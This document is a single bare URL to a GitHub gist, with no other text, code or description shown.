https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70